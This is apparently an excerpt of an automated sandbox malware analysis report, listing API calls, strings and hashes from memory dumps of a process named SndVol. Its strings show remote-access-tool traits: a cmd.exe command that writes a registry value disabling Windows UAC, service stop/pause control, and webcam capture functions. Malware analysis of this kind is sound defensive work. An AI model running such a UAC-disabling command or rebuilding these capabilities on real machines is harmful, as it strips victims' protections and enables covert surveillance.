                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                  • Instruction ID: 82ddc257dd7a2f3be11cd87678f9bbc0f86b58e34d0e9711ffe3baa5e1c03626
                                                                  • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                  • Instruction Fuzzy Hash: 3D81E6B2A0071AABF7249E68CC51B6A73EDAFC5768F14453AE511D72A0E774F900CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __cftoe
                                                                  • String ID:
                                                                  • API String ID: 4189289331-0
                                                                  • Opcode ID: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
                                                                  • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                                                  • Opcode Fuzzy Hash: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
                                                                  • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                  • String ID: a/p$am/pm
                                                                  • API String ID: 2936374016-3206640213
                                                                  • Opcode ID: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
                                                                  • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                                                  • Opcode Fuzzy Hash: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
                                                                  • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                  • int.LIBCPMT ref: 0040F8D7
                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                  • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                  • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                  • String ID:
                                                                  • API String ID: 3815856325-0
                                                                  • Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                  • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                                                  • Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                  • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 048F065C
                                                                  • int.LIBCPMT ref: 048F066F
                                                                    • Part of subcall function 048ED881: std::_Lockit::_Lockit.LIBCPMT ref: 048ED892
                                                                    • Part of subcall function 048ED881: std::_Lockit::~_Lockit.LIBCPMT ref: 048ED8AC
                                                                  • std::_Facet_Register.LIBCPMT ref: 048F06AF
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 048F06B8
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048F06D6
                                                                  • __Init_thread_footer.LIBCMT ref: 048F0717
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                  • String ID:
                                                                  • API String ID: 3815856325-0
                                                                  • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                  • Instruction ID: 70b1090fae1e227f683cb453781c07f8627173f45cdf0592596fa2fd3c04b11c
                                                                  • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                  • Instruction Fuzzy Hash: 1C213E325002189BDB10FF68DC449DD77B89F85324F200A76E944E72A1EF74BE418BD5
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                  • String ID:
                                                                  • API String ID: 493672254-0
                                                                  • Opcode ID: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                  • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                                                  • Opcode Fuzzy Hash: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                  • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                  • _free.LIBCMT ref: 0044575C
                                                                  • _free.LIBCMT ref: 00445784
                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                  • _abort.LIBCMT ref: 004457A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                  • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                                                  • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                  • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
                                                                  • _free.LIBCMT ref: 049264F4
                                                                  • _free.LIBCMT ref: 0492651C
                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926529
                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
                                                                  • _abort.LIBCMT ref: 0492653B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                  • Instruction ID: 97c588c807601fc1a46998a26b2a592aca42c5afa0284ba6a8d53f99eda47f6f
                                                                  • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                  • Instruction Fuzzy Hash: D7F0283520063236E3117B397F08F5B266A9BD2A2AF214138F819D359CFE75FD019265
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                  • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                                                  • Opcode Fuzzy Hash: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                  • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                  • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                                                  • Opcode Fuzzy Hash: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                  • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                  • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                                                  • Opcode Fuzzy Hash: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                  • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,048EA4DD), ref: 048EA43B
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,048EA4DD), ref: 048EA44A
                                                                  • Sleep.KERNEL32(00002710,?,?,?,048EA4DD), ref: 048EA477
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,048EA4DD), ref: 048EA47E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                  • String ID: h G
                                                                  • API String ID: 1958988193-3300504347
                                                                  • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                  • Instruction ID: 163d87a489a4e6ffe1251f840c5b4e6d25783326c3e5547244f917c35bed977f
                                                                  • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                  • Instruction Fuzzy Hash: 10110D706003806AE7357726ED8CA3E7B9BBB47B59F440E58F681C3991C6947944832B
                                                                  APIs
                                                                  • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                  • GetLastError.KERNEL32 ref: 0041B335
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                  • String ID: 0$MsgWindowClass
                                                                  • API String ID: 2877667751-2410386613
                                                                  • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                  • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                                                  • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                  • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                                                  APIs
                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                    • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                  • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                  • String ID: /zC
                                                                  • API String ID: 2633735394-4132788633
                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                  • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                  • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                  • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID: ]tA
                                                                  • API String ID: 4116985748-3517819141
                                                                  • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                  • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                                                  • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                  • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                                                  Strings
                                                                  • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                  • API String ID: 2922976086-4183131282
                                                                  • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                  • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                                                  • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                  • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                  • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                                                  • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                  • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  Strings
                                                                  • Connection KeepAlive | Disabled, xrefs: 004050D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                  • String ID: Connection KeepAlive | Disabled
                                                                  • API String ID: 2993684571-3818284553
                                                                  • Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                  • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                                                  • Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                  • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetCursorInfo$User32.dll$`ou
                                                                  • API String ID: 1646373207-4165041016
                                                                  • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                  • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                                                  • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                  • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                  • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                                                  • Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                  • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4
                                                                    • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prologSleep
                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                  • API String ID: 3469354165-3547787478
                                                                  • Opcode ID: af6715aaa0d5b36cc8a5e63bd834b4e59a3ecd3df2cca7b880d435d9cf50a0b7
                                                                  • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                                                  • Opcode Fuzzy Hash: af6715aaa0d5b36cc8a5e63bd834b4e59a3ecd3df2cca7b880d435d9cf50a0b7
                                                                  • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                                                  APIs
                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  • _free.LIBCMT ref: 00442318
                                                                  • _free.LIBCMT ref: 0044232F
                                                                  • _free.LIBCMT ref: 0044234E
                                                                  • _free.LIBCMT ref: 00442369
                                                                  • _free.LIBCMT ref: 00442380
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
